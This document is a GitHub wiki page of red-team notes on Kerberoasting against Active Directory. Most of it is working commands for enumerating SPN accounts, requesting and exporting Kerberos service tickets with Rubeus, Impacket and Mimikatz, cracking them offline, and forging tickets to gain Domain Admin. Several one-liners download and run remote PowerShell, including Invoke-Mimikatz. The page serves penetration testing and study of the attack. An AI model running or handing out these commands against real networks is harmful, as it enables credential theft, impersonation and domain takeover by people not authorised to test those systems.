Kerberoasting - CraigDonkin/Infrastructure GitHub Wiki

Kerberoasting Notes

  • Request Service Ticket (TGS) for any service that has a registered SPN in a user or computer account in AD
  • SPNs are service principal names
    • "a unique identifier of a service instance. SPNs are used by kerberos authentication to associate a service instance with a service logon account"
  • Crack the service account plaintext password offline

General Process

  1. Attacker gets a TGT from the domain controller after authenticating to the domain with some compromise creds
  2. The attacker uses the TGT to issue a service ticket request for a SPN in the form sname/host
  3. The DC extracts the information from the TGT and makes a service ticket
  4. the DC looks up which account has requested the SPN registered in its servicePrincipalName field
  5. The service ticket is encrypted with the hash of the account with the requested SPN registered
  6. Ticket is sent back to the attacker
  7. The attacker extracts the encrypted service ticket
  8. As the ticket was requested with the hash of the account linked to the requested SPN, the attacker can crack this offline to recover the account plaintext password

Red Teaming

  • Get user creds (phishing, left on a file server, password breach etc )
  • Kerberoast DCs
  • Attempt to crack service account passwords
    • Service account passwords rarely change
  • Run Blood/sharp hound
  • Where can these users login? Is there a route to DA?
  • Domain Admin

Methods

A lot of notes taken from https://room362.com/post/2016/kerberoast-pt1/ series of posts.

Also https://pentestlab.blog/2018/06/12/kerberoast/

Find users with SPN before roasting

Can be stealthier as you just roast account you want to roast.

ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

Retrieving SPN Tickets

SetSPN

Get-SPN

More examples from the GitHub:

Find servers running specific services:

Get-SPN  -type service -search "*www*"
Get-SPN  -type service -search "MSSQLSvc*"
Get-SPN  -type service -search "MSSQLSvc*" -List yes 
Get-SPN  -type service -search "*vnc*" -list yes | select server -Unique
Get-SPN  -type service -search "MSSQLSvc*" -List yes | Select Server 
Get-SPN  -type service -search "MSSQLSvc*" -DomainController 192.168.1.100 -Credential domain\user
Get-SPN  -type service -search "MSSQLSvc*" -List yes -DomainController 192.168.1.100 -Credential domain\user 
Get-SPN  -type service -search "MSSQLSvc*" -List yes -DomainController 192.168.1.100 -Credential domain\user | Select Server

Find servers where a specific user is registered to run services:

Get-SPN  -type user -search "serveradmin"
Get-SPN  -type user -search "sqladmin"
Get-SPN  -type user -search "sqladmin" -List yes | format-table -autosize
Get-SPN  -type user -search "sqladmin" -List yes | Select Server | format-table -autosize
Get-SPN  -type user -search "sqladmin" -DomainController 192.168.1.100 -Credential domain\user
Get-SPN  -type user -search "sqladmin" -List yes -DomainController 192.168.1.100 -Credential domain\user 
Get-SPN  -type user -search "sqladmin" -List yes -DomainController 192.168.1.100 -Credential domain\user | Select Server

Powershell Empire

GetUserSPNs.vbs

cscript GetUserSPNs.vbs

GetUserSPNs.ps1

PowerShell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercon  tent.com/nidem/kerberoast/master/GetUserSPNs.ps1')

Impacket

./GetUserSPNs.py -dc-ip [ip] domain/user

  • -request flag will request all of the SPN tickets in John the Ripper format

Meterpreter/Mimikatz

load kiwi
kerberos_ticket_list

or

kiwi_cmd kerberos::list

RiskySPN

https://github.com/cyberark/RiskySPN

Find-PotentiallyCrackableAccounts -FullData -Verbose

This script will look for ones that it thinks may be weak due to user account and password expiration .

The following will return all user accounts that have an associated SPN:

Find-PotentiallyCrackableAccounts -Domain "domain"

This will export as CSV:

Export-PotentiallyCrackableAccounts

Kerberoasting without Mimikatz

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon

invoke-kerberoast | fl

Invoke-Kerberoast -Domain blah | fl

This will be in the john format by default but -OutputFormat hashcat will use hashcat format

-AdminCountflag will only kerberoast accounts with AdminCount=1

NetExec

nxc ldap <IP> -u <username> -p <password> --kerberoasting <output>

Rubeus

https://github.com/GhostPack/Rubeus

The Rubeus kerberos attack tool has a kerberoast option

rubeus.exe kerberoast

Kerberoast an OU and save as a text file:

rubeus.exe kerberoast /ou:<ou> /outfile:<file location>

Kerberoast a specific user:

rubeus.exe kerberoast /user:<username>

Kerberoasting a specific SPN:

rubeus.exe kerberoast /spn:<spn>

The /nowrap is useful for cracking as the hash is on one line.

Requesting SPN Kerberos Tickets

One specific ticket

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "something/domain"

RiskySPN

Get-TGSCipher -SPN "Domain/SPN"

Getting Just the User Tickets

PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/nidem/kerberoast/master/GetUserSPNs.ps1") | ForEach-Object {try{New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.ServicePrincipalName}catch{}}

Exporting Tickets

Once ticket is requested this is how you can get them out of the system.

MimiKatz

kerberos::list /export

This will generate a file per ticket . The below uses the invoke-mimikatz script to pull mimikatz into memory then store the tickets as base64

PS C:\> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
PS C:\> Invoke-Mimikatz -Command 'standard::base64 "kerberos::list /export" exit'

Powershell Empire

usemodule credentials/mimikatz/extract_tickets

This module just does:

standard::base64
kerberos::list /export

You can also use the following to extract ticket hashes as either john or hashcat format

usemodule credentials/invoke_kerberoast
set OutputFormat
run

Convert Binary Tickets to Crackable Format

Kirbi2John

https://github.com/nidem/kerberoast/blob/master/kirbi2john.py

https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/run/kirbi2john.py

./kirbi2john.py blah.kirbi

PyKerberoast

https://github.com/skelsec/PyKerberoast

Obsolete now, the new version is :

https://github.com/skelsec/kerberoast

python kerberoastv2.py -a ip -b "dc=blah,dc=blah" -d domain -u username

Cracking SPN Tickets

John the Ripper

Use Magnum Ripper https://github.com/magnumripper/JohnTheRipper

./kirbi2john.py *.kirbi > /tmp/johnkirb.txt

`./john /tmp/johnkirb.txt --wordlist

Hashcat

Tickets from Impacket already in crackable format

otherwise:

cat kirbi2johnoutput.txt | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'

./oclHashcat -m 13100 hash

What I found on a red team was to use a big wordlist then use hashcat rules such as:

  • leetspeak.rule
  • d3ad0ne.rule

TGSrepcrack

Part of the kerberoast toolkit

https://github.com/nidem/kerberoast

./tgsrepcrack.py wordlist.txt blah.kirbi

Rewriting Service Tickets

  • Tickets are signed with the NTLM hash of the password
  • If ticket hash has been cracked you can rewrite the ticket with kerberoast
  • Allows you to impersonate a domain user or a fake account

./kerberoast.py -p Password -r blah.kirbi -w something.kirbi -u 500

Or add user to domain admin group:

./kerberoast.py -p Password1 -r 1-blah.kirbi -w something.kirbi -g 512

The following would inject back into RAM with Mimicatz

``kerberos::ptt something.kirbi`

Resources

https://room362.com/post/2016/kerberoast-pt3/

https://room362.com/post/2016/kerberoast-pt1/

https://room362.com/post/2016/kerberoast-pt2

https://adsecurity.org/?tag=kerberoast

https://pentestlab.blog/2018/06/12/kerberoast/

⚠️ **GitHub.com Fallback** ⚠️